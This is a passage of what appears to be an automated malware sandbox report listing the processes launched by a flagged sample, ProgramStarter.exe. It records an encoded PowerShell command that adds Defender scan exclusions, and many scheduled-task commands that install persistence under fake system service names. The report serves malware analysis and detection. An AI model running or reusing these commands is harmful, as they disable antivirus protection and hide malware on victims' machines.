                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                  Reputation:low

                                                                                                                  General

                                                                                                                  Target ID:1
                                                                                                                  Start time:00:17:04
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\ProgramStarter.exe"
                                                                                                                  Imagebase:0x750000
                                                                                                                  File size:471552 bytes
                                                                                                                  MD5 hash:0326F45523014399DEA91452C957B5E0
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                  Yara matches:
                                                                                                                  • Rule: Linux_Trojan_Pornoasset_927f314f, Description: unknown, Source: 00000001.00000003.291048663.0000000006B81000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 31%, ReversingLabs
                                                                                                                  Reputation:low

                                                                                                                  General

                                                                                                                  Target ID:2
                                                                                                                  Start time:00:17:11
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:cmd.exe" /C powershell -EncodedCommand "PAAjAHMAVQBCAHYAVgBJAEcAcABFAEoAbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAYwBJAFQAWQBjAHAAQgBHAEwAVgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAagB0AEcAZAB6AFEAYwBUAEUATQBPAGwAZQBKAFYAcAB3AGkAbAAjAD4AIABAACgAIAA8ACMARgBvAEwAVABHAFkAcwBGAHEAcwByAGkAWQB5ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBwAEsAUABlAHYARgBGAGwAUgBOAGkAWgBFAFAAWABLAGgATgBJACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBRAFUAQgBKAHkAdgBlAEsARgBUACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEkAcQBjAFcAcQBHAEYAagBSAGMATQBFAGgAWQBzAHUAYgAjAD4A
                                                                                                                  Imagebase:0xb0000
                                                                                                                  File size:232960 bytes
                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  General

                                                                                                                  Target ID:3
                                                                                                                  Start time:00:17:11
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff745070000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  General

                                                                                                                  Target ID:4
                                                                                                                  Start time:00:17:12
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:powershell -EncodedCommand "PAAjAHMAVQBCAHYAVgBJAEcAcABFAEoAbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAYwBJAFQAWQBjAHAAQgBHAEwAVgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAagB0AEcAZAB6AFEAYwBUAEUATQBPAGwAZQBKAFYAcAB3AGkAbAAjAD4AIABAACgAIAA8ACMARgBvAEwAVABHAFkAcwBGAHEAcwByAGkAWQB5ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBwAEsAUABlAHYARgBGAGwAUgBOAGkAWgBFAFAAWABLAGgATgBJACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBRAFUAQgBKAHkAdgBlAEsARgBUACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEkAcQBjAFcAcQBHAEYAagBSAGMATQBFAGgAWQBzAHUAYgAjAD4A"
                                                                                                                  Imagebase:0xeb0000
                                                                                                                  File size:430592 bytes
                                                                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                  Reputation:high

                                                                                                                  General

                                                                                                                  Target ID:5
                                                                                                                  Start time:00:17:14
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                  Imagebase:0xb0000
                                                                                                                  File size:232960 bytes
                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  General

                                                                                                                  Target ID:6
                                                                                                                  Start time:00:17:14
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                  Imagebase:0xb0000
                                                                                                                  File size:232960 bytes
                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  General

                                                                                                                  Target ID:7
                                                                                                                  Start time:00:17:15
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff745070000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  General

                                                                                                                  Target ID:8
                                                                                                                  Start time:00:17:15
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff745070000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  General

                                                                                                                  Target ID:9
                                                                                                                  Start time:00:17:15
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                  Imagebase:0xb0000
                                                                                                                  File size:232960 bytes
                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  General

                                                                                                                  Target ID:10
                                                                                                                  Start time:00:17:15
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                  Imagebase:0xb0000
                                                                                                                  File size:232960 bytes
                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:11
                                                                                                                  Start time:00:17:15
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff745070000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:12
                                                                                                                  Start time:00:17:15
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                  Imagebase:0xff0000
                                                                                                                  File size:185856 bytes
                                                                                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:13
                                                                                                                  Start time:00:17:15
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff745070000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:14
                                                                                                                  Start time:00:17:15
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                  Imagebase:0xb0000
                                                                                                                  File size:232960 bytes
                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:15
                                                                                                                  Start time:00:17:15
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                  Imagebase:0xff0000
                                                                                                                  File size:185856 bytes
                                                                                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:16
                                                                                                                  Start time:00:17:15
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                  Imagebase:0xff0000
                                                                                                                  File size:185856 bytes
                                                                                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:17
                                                                                                                  Start time:00:17:15
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                  Imagebase:0xff0000
                                                                                                                  File size:185856 bytes
                                                                                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:18
                                                                                                                  Start time:00:17:15
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                  Imagebase:0xb0000
                                                                                                                  File size:232960 bytes
                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:19
                                                                                                                  Start time:00:17:15
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff745070000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:20
                                                                                                                  Start time:00:17:15
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                  Imagebase:0xb0000
                                                                                                                  File size:232960 bytes
                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:21
                                                                                                                  Start time:00:17:15
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff745070000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:22
                                                                                                                  Start time:00:17:15
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                  Imagebase:0xff0000
                                                                                                                  File size:185856 bytes
                                                                                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:23
                                                                                                                  Start time:00:17:15
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                  Imagebase:0xb0000
                                                                                                                  File size:232960 bytes
                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:24
                                                                                                                  Start time:00:17:15
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff745070000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:25
                                                                                                                  Start time:00:17:16
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                  Imagebase:0xff0000
                                                                                                                  File size:185856 bytes
                                                                                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:26
                                                                                                                  Start time:00:17:16
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff745070000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:27
                                                                                                                  Start time:00:17:16
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk697" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                  Imagebase:0xb0000
                                                                                                                  File size:232960 bytes
                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:28
                                                                                                                  Start time:00:17:16
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                  Imagebase:0xff0000
                                                                                                                  File size:185856 bytes
                                                                                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:29
                                                                                                                  Start time:00:17:16
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                  Imagebase:0xff0000
                                                                                                                  File size:185856 bytes
                                                                                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:30
                                                                                                                  Start time:00:17:17
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk64" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                  Imagebase:0xb0000
                                                                                                                  File size:232960 bytes
                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:31
                                                                                                                  Start time:00:17:18
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff745070000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:32
                                                                                                                  Start time:00:17:18
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk620" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                  Imagebase:0xb0000
                                                                                                                  File size:232960 bytes
                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:33
                                                                                                                  Start time:00:17:18
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff745070000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:34
                                                                                                                  Start time:00:17:18
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk248" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                  Imagebase:0xb0000
                                                                                                                  File size:232960 bytes
                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:35
                                                                                                                  Start time:00:17:19
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff745070000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:36
                                                                                                                  Start time:00:17:19
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                  Imagebase:0x7ff651c80000
                                                                                                                  File size:51288 bytes
                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:37
                                                                                                                  Start time:00:17:19
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                                                                  Imagebase:0x7ff651c80000
                                                                                                                  File size:51288 bytes
                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:38
                                                                                                                  Start time:00:17:20
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                  Imagebase:0xb0000
                                                                                                                  File size:232960 bytes
                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:39
                                                                                                                  Start time:00:17:20
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff745070000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:40
                                                                                                                  Start time:00:17:20
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk697" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                  Imagebase:0xff0000
                                                                                                                  File size:185856 bytes
                                                                                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:41
                                                                                                                  Start time:00:17:20
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
